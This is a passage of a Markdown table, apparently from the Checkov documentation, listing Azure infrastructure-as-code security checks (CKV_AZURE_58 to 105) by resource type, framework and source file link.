[SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1710 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | Bicep | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1711 | CKV_AZURE_58 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces enables managed virtual networks | Terraform | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 1712 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 1713 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | Bicep | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 1714 | CKV_AZURE_59 | resource | azurerm_storage_account | Ensure that Storage accounts disallow public access | Terraform | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountDisablePublicAccess.py) | -| 1715 | CKV_AZURE_61 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for App Service | Terraform | [AzureDefenderOnAppServices.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnAppServices.py) | -| 1716 | CKV_AZURE_62 | resource | azurerm_function_app | Ensure function apps are not accessible from all regions | Terraform | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppDisallowCORS.py) | -| 1717 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 1718 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | Bicep | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 1719 | CKV_AZURE_63 | resource | azurerm_app_service | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1720 | CKV_AZURE_63 | resource | azurerm_linux_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1721 | CKV_AZURE_63 | resource | azurerm_windows_web_app | Ensure that App service enables HTTP logging | Terraform | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceHttpLoggingEnabled.py) | -| 1722 | CKV_AZURE_64 | resource | azurerm_storage_sync | Ensure that Azure File Sync disables public network access | Terraform | [StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageSyncPublicAccessDisabled.py) | -| 1723 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 1724 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | Bicep | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 1725 | CKV_AZURE_65 | resource | azurerm_app_service | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1726 | CKV_AZURE_65 | resource | azurerm_linux_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1727 | CKV_AZURE_65 | resource | azurerm_windows_web_app | Ensure that App service enables detailed error messages | Terraform | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDetailedErrorMessagesEnabled.py) | -| 1728 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 1729 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | Bicep | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 1730 | CKV_AZURE_66 | resource | azurerm_app_service | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1731 | CKV_AZURE_66 | resource | azurerm_linux_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1732 | CKV_AZURE_66 | resource | azurerm_windows_web_app | Ensure that App service enables failed request tracing | Terraform | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnableFailedRequest.py) | -| 1733 | CKV_AZURE_67 | resource | azurerm_function_app | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1734 | CKV_AZURE_67 | resource | azurerm_function_app_slot | Ensure that 'HTTP Version' is the latest, if used to run the Function app | Terraform | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppHttpVersionLatest.py) | -| 1735 | CKV_AZURE_68 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server disables public network access | Terraform | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgreSQLServerPublicAccessDisabled.py) | -| 1736 | CKV_AZURE_69 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Azure SQL database servers | Terraform | [AzureDefenderOnSqlServers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServers.py) | -| 1737 | CKV_AZURE_70 | resource | azurerm_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1738 | CKV_AZURE_70 | resource | azurerm_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1739 | CKV_AZURE_70 | resource | azurerm_linux_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1740 | CKV_AZURE_70 | resource | azurerm_linux_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1741 | CKV_AZURE_70 | resource | azurerm_windows_function_app | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1742 | CKV_AZURE_70 | resource | azurerm_windows_function_app_slot | Ensure that Function apps is only accessible over HTTPS | Terraform | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppsAccessibleOverHttps.py) | -| 1743 | CKV_AZURE_71 | resource | azurerm_app_service | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1744 | CKV_AZURE_71 | resource | azurerm_linux_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1745 | CKV_AZURE_71 | resource | azurerm_windows_web_app | Ensure that Managed identity provider is enabled for app services | Terraform | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceIdentityProviderEnabled.py) | -| 1746 | CKV_AZURE_72 | resource | azurerm_app_service | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1747 | CKV_AZURE_72 | resource | azurerm_linux_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1748 | CKV_AZURE_72 | resource | azurerm_windows_web_app | Ensure that remote debugging is not enabled for app services | Terraform | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceRemoteDebuggingNotEnabled.py) | -| 1749 | CKV_AZURE_73 | resource | azurerm_automation_variable_bool | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1750 | CKV_AZURE_73 | resource | azurerm_automation_variable_datetime | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1751 | CKV_AZURE_73 | resource | azurerm_automation_variable_int | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1752 | CKV_AZURE_73 | resource | azurerm_automation_variable_string | Ensure that Automation account variables are encrypted | Terraform | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AutomationEncrypted.py) | -| 1753 | CKV_AZURE_74 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer (Kusto) uses disk encryption | Terraform | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerUsesDiskEncryption.py) | -| 1754 | CKV_AZURE_75 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer uses double encryption | Terraform | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDataExplorerDoubleEncryptionEnabled.py) | -| 1755 | CKV_AZURE_76 | resource | azurerm_batch_account | Ensure that Azure Batch account uses key vault to encrypt data | Terraform | [AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureBatchAccountUsesKeyVaultEncryption.py) | -| 1756 | CKV_AZURE_77 | resource | azurerm_network_security_group | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1757 | CKV_AZURE_77 | resource | azurerm_network_security_rule | Ensure that UDP Services are restricted from the Internet | Terraform | [NSGRuleUDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/NSGRuleUDPAccessRestricted.py) | -| 1758 | CKV_AZURE_78 | resource | azurerm_app_service | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1759 | CKV_AZURE_78 | resource | azurerm_linux_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1760 | CKV_AZURE_78 | resource | azurerm_windows_web_app | Ensure FTP deployments are disabled | Terraform | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceFTPSState.py) | -| 1761 | CKV_AZURE_79 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for SQL servers on machines | Terraform | [AzureDefenderOnSqlServerVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnSqlServerVMS.py) | -| 1762 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 1763 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Bicep | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 1764 | CKV_AZURE_80 | resource | azurerm_app_service | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1765 | CKV_AZURE_80 | resource | azurerm_windows_web_app | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | Terraform | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceDotnetFrameworkVersion.py) | -| 1766 | CKV_AZURE_81 | resource | azurerm_app_service | Ensure that 'PHP version' is the latest, if used to run the web app | Terraform | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePHPVersion.py) | -| 1767 | CKV_AZURE_82 | resource | azurerm_app_service | Ensure that 'Python version' is the latest, if used to run the web app | Terraform | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePythonVersion.py) | -| 1768 | CKV_AZURE_83 | resource | azurerm_app_service | Ensure that 'Java version' is the latest, if used to run the web app | Terraform | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceJavaVersion.py) | -| 1769 | CKV_AZURE_84 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Storage | Terraform | [AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnStorage.py) | -| 1770 | CKV_AZURE_85 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Kubernetes | Terraform | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKubernetes.py) | -| 1771 | CKV_AZURE_86 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Container Registries | Terraform | [AzureDefenderOnContainerRegistry.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnContainerRegistry.py) | -| 1772 | CKV_AZURE_87 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender is set to On for Key Vault | Terraform | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderOnKeyVaults.py) | -| 1773 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 1774 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | Bicep | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 1775 | CKV_AZURE_88 | resource | azurerm_app_service | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1776 | CKV_AZURE_88 | resource | azurerm_linux_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1777 | CKV_AZURE_88 | resource | azurerm_windows_web_app | Ensure that app services use Azure Files | Terraform | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceUsedAzureFiles.py) | -| 1778 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 1779 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | Bicep | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 1780 | CKV_AZURE_89 | resource | azurerm_redis_cache | Ensure that Azure Cache for Redis disables public network access | Terraform | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCachePublicNetworkAccessEnabled.py) | -| 1781 | CKV_AZURE_91 | resource | azurerm_redis_cache | Ensure that only SSL are enabled for Cache for Redis | Terraform | [RedisCacheEnableNonSSLPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheEnableNonSSLPort.py) | -| 1782 | CKV_AZURE_92 | resource | azurerm_linux_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1783 | CKV_AZURE_92 | resource | azurerm_windows_virtual_machine | Ensure that Virtual Machines use managed disks | Terraform | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py) | -| 1784 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 1785 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Bicep | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 1786 | CKV_AZURE_93 | resource | azurerm_managed_disk | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | Terraform | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureManagedDiskEncryptionSet.py) | -| 1787 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 1788 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | Bicep | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 1789 | CKV_AZURE_94 | resource | azurerm_mysql_flexible_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1790 | CKV_AZURE_94 | resource | azurerm_mysql_server | Ensure that My SQL server enables geo-redundant backups | Terraform | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLGeoBackupEnabled.py) | -| 1791 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 1792 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Bicep | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 1793 | CKV_AZURE_95 | resource | azurerm_virtual_machine_scale_set | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | Terraform | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 1794 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 1795 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | Bicep | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 1796 | CKV_AZURE_96 | resource | azurerm_mysql_server | Ensure that MySQL server enables infrastructure encryption | Terraform | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/MySQLEncryptionEnabled.py) | -| 1797 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 1798 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 1799 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 1800 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | Bicep | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 1801 | CKV_AZURE_97 | resource | azurerm_linux_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1802 | CKV_AZURE_97 | resource | azurerm_windows_virtual_machine_scale_set | Ensure that Virtual machine scale sets have encryption at host enabled | Terraform | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py) | -| 1803 | CKV_AZURE_98 | resource | azurerm_container_group | Ensure that Azure Container group is deployed into virtual network | Terraform | [AzureContainerGroupDeployedIntoVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerGroupDeployedIntoVirtualNetwork.py) | -| 1804 | CKV_AZURE_99 | resource | azurerm_cosmosdb_account | Ensure Cosmos DB accounts have restricted access | Terraform | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBAccountsRestrictedAccess.py) | -| 1805 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 1806 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Bicep | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 1807 | CKV_AZURE_100 | resource | azurerm_cosmosdb_account | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | Terraform | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBHaveCMK.py) | -| 1808 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 1809 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | Bicep | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 1810 | CKV_AZURE_101 | resource | azurerm_cosmosdb_account | Ensure that Azure Cosmos DB disables public network access | Terraform | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CosmosDBDisablesPublicNetwork.py) | -| 1811 | CKV_AZURE_102 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables geo-redundant backups | Terraform | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PostgressSQLGeoBackupEnabled.py) | -| 1812 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 1813 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | Bicep | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 1814 | CKV_AZURE_103 | resource | azurerm_data_factory | Ensure that Azure Data Factory uses Git repository for source control | Terraform | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryUsesGitRepository.py) | -| 1815 | CKV_AZURE_104 | resource | azurerm_data_factory | Ensure that Azure Data factory public network access is disabled | Terraform | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataFactoryNoPublicNetworkAccess.py) | -| 1816 | CKV_AZURE_105 | resource | azurerm_data_lake_store | Ensure that Data Lake Store accounts enables encryption | 